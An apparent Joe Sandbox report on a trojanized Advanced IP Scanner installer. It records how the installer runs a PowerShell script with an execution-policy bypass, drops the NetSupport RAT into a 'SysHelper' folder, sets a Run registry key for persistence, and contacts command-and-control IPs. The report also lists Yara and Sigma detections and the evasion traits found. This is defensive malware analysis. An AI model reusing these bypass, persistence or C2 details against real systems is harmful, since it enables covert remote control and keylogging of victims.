Edit tour

Windows Analysis Report
Advanced_IP_Scanner_2.5.4594.12.exe

Overview

General Information

Sample name:	Advanced_IP_Scanner_2.5.4594.12.exe
Analysis ID:	1546304
MD5:	446c29d515104b6752c1e9da981d4e5e
SHA1:	d52760df6b22805a4470a6b2e72654ce36577f30
SHA256:	7b13496fb45b51e821771d63bbd1d503f07710f676481ff34962b051283d8033
Tags:	exeuser-NDA0E
Infos:

Detection

NetSupport RAT, NetSupport Downloader

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	33
Range:	0 - 100

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell drops NetSupport RAT client

Suricata IDS alerts for network traffic

Yara detected Advanced IP Scanner Hacktool

Yara detected NetSupport Downloader

Bypasses PowerShell execution policy

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Yara signature match

Classification

Process Tree

System is w10x64

Advanced_IP_Scanner_2.5.4594.12.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" MD5: 446C29D515104B6752C1E9DA981D4E5E)

Advanced_IP_Scanner_2.5.4594.12.tmp (PID: 7032 cmdline: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" MD5: 597637EDBEBB79D482E762E238209BCD)

powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

client32.exe (PID: 5304 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

client32.exe (PID: 2228 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

client32.exe (PID: 1832 cmdline: "C:\Users\user\AppData\Roaming\SysHelper\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmp	JoeSecurity_AdvancedIPScannerHacktool	Yara detected Advanced IP Scanner Hacktool	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\SysHelper\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Program Files (x86)\Advanced IP Scanner\unins000.dat	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
Click to see the 6 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000000.2061459893.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000000.2158956147.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2248759340.0000000000708000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.3638481461.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000000.2240623467.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2248546826.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000008.00000002.2160400872.0000000000404000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000007.00000002.3639184086.0000000002572000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: powershell.exe PID: 7132	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: powershell.exe PID: 7132	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x42fae7:$b1: ::WriteAllBytes( 0x42fab2:$b2: ::FromBase64String( 0xf582:$s1: -join 0xff09:$s1: -join 0x67b092:$s1: -join 0x7e2fc1:$s1: -join 0x7f0096:$s1: -join 0x7f3468:$s1: -join 0x7f3b1a:$s1: -join 0x7f560b:$s1: -join 0x7f7811:$s1: -join 0x7f8038:$s1: -join 0x7f88a8:$s1: -join 0x7f8fe3:$s1: -join 0x7f9015:$s1: -join 0x7f905d:$s1: -join 0x7f907c:$s1: -join 0x7f98cc:$s1: -join 0x7f9a48:$s1: -join 0x7f9ac0:$s1: -join 0x7f9b53:$s1: -join
Process Memory Space: client32.exe PID: 5304	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 5304	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 2228	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 2228	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 1832	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 1832	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.client32.exe.688b0000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.688b0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.0.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.688b0000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.400000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.client32.exe.111b3308.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.68890000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.68890000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.68890000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.68590000.3.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
10.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
7.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 20 entries

Other

Source	Rule	Description	Author	Strings
amsi32_7132.amsi.csv	JoeSecurity_NetSupportDownloader	Yara detected NetSupport Downloader	Joe Security
amsi32_7132.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2e4f78:$b1: ::WriteAllBytes( 0x2e4f42:$b2: ::FromBase64String( 0x2f16a4:$s1: -join 0x2eae50:$s4: += 0x2eaf12:$s4: += 0x2ef139:$s4: += 0x2f1256:$s4: += 0x2f1540:$s4: += 0x2f1686:$s4: += 0x2f4e9c:$s4: += 0x2f4fa0:$s4: += 0x2f83fc:$s4: += 0x2f8adc:$s4: += 0x2f8f92:$s4: += 0x2f8fe7:$s4: += 0x2f925b:$s4: += 0x2f928a:$s4: += 0x2f97d2:$s4: += 0x2f9801:$s4: += 0x2f98e0:$s4: += 0x2fbb77:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7032, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", ProcessId: 7132, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7032, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", ProcessId: 7132, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7032, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", ProcessId: 7132, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\SysHelper\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7132, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7132, TargetFilename: C:\Users\user\AppData\Roaming\SysHelper\pcicapi.dll

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp" /SL5="$402A0,18032967,815616,C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp, ParentProcessId: 7032, ParentProcessName: Advanced_IP_Scanner_2.5.4594.12.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1", ProcessId: 7132, ProcessName: powershell.exe

Remote Access Functionality

Sigma detected: Powershell drops NetSupport RAT client

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7132, TargetFilename: C:\Users\user\AppData\Roaming\SysHelper\NSM.LIC

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T19:00:58.789554+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	49733	TCP
2024-10-31T19:01:37.187096+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49758	TCP

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T19:00:43.628569+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.4	49739	151.236.16.15	443	TCP
2024-10-31T19:00:43.628569+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.4	49740	199.188.200.195	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		7_2_110AC820
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,		8_2_110AC820

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	EXE: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	EXE: C:\Users\user\AppData\Roaming\SysHelper\client32.exe			Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	EXE: C:\Users\user\AppData\Roaming\SysHelper\remcmdstub.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	EXE: C:\Users\user\AppData\Roaming\SysHelper\client32.exe			Jump to behavior

Uses 32bit PE files

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: certificate valid

Uses new MSVCR Dlls

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\SysHelper\msvcr100.dll

Jump to behavior

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Advanced_IP_Scanner_2.5.4594.12.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.3641013558.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2161613841.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2250587498.00000000688B2000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: is-50T4N.tmp.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: is-3DFK3.tmp.1.dr
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: is-7T7KO.tmp.1.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: is-G1AVJ.tmp.1.dr
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb- source: powershell.exe, 00000005.00000002.2183755399.0000000009739000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: is-37BEP.tmp.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: is-8NFDN.tmp.1.dr
Source:	Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: is-UUUMK.tmp.1.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: is-JD615.tmp.1.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: is-B6942.tmp.1.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: is-GO656.tmp.1.dr
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.3640696610.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2161392777.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2249977529.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: is-MLS3P.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2132549771.0000000002D9D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr
